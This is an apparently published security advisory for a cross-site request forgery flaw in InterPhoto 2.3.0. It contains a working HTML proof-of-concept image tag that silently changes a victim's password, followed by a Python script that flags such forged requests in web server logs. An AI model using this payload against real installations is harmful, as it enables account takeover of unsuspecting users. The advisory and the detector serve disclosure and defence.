
InterPhoto 2.3.0 Cross-site Request Forgery

Description

A cross-site request forgery vulnerability in InterPhoto 2.3.0 can be exploited to change a user's password.

Proof Of Concept

<html>
    <body>
        <img src="http://localhost/interphoto/mydesk.edit.php?action=updateuser&password=newpassword&repassword=newpassword&email=a%40a.com&userfullname=&usercompany=&useraddress=&userpostcode=&usertel=&userfax=&useronline=&userwebsite=" />
    </body>
</html>
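
One way to look for the request above in web server access logs (an added example, not part of the original advisory). It assumes the Apache/nginx "combined" log format; the host name `photos.example.test`, the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" log format (assumed; adjust for other formats).
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

def suspicious_updates(lines, site_host):
    """Return (ip, timestamp, reason) for updateuser requests that look forged."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        query = parse_qs(url.query, keep_blank_values=True)
        # Only the endpoint and action named in the advisory are of interest.
        if not url.path.endswith("/mydesk.edit.php"):
            continue
        if query.get("action") != ["updateuser"]:
            continue
        ref_host = urlsplit(m["referer"]).hostname  # None for "-" or empty
        if ref_host is None:
            reason = "no Referer"
        elif ref_host != site_host:
            reason = "cross-site Referer: " + ref_host
        elif m["method"] == "GET" and "password" in query:
            reason = "password change sent as GET"
        else:
            continue  # same-site request without a password in the URL
        hits.append((m["ip"], m["ts"], reason))
    return hits

# Constructed sample log lines (documentation IP ranges, made-up hosts).
SAMPLE = [
    '198.51.100.7 - - [12/Mar/2018:10:01:02 +0000] "GET /interphoto/mydesk.edit.php?action=updateuser&password=x&repassword=x&email=a%40a.com HTTP/1.1" 200 512 "http://forum.example.net/thread/9" "Mozilla/5.0"',
    '198.51.100.8 - - [12/Mar/2018:10:02:10 +0000] "POST /interphoto/mydesk.edit.php?action=updateuser HTTP/1.1" 302 0 "http://photos.example.test/interphoto/mydesk.edit.php" "Mozilla/5.0"',
    '198.51.100.9 - - [12/Mar/2018:10:03:30 +0000] "GET /interphoto/mydesk.edit.php?action=updateuser&password=x&repassword=x HTTP/1.1" 200 512 "http://photos.example.test/interphoto/" "Mozilla/5.0"',
    '198.51.100.9 - - [12/Mar/2018:10:03:31 +0000] "GET /interphoto/index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_updates(SAMPLE, "photos.example.test"):
        print(hit)
```

Only the request line is logged, so parameters sent in a POST body are not visible to this check, and "no Referer" hits need manual review because a referrer policy can strip the header from legitimate requests.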


Copyright © 2018 AutoSec Tools LLC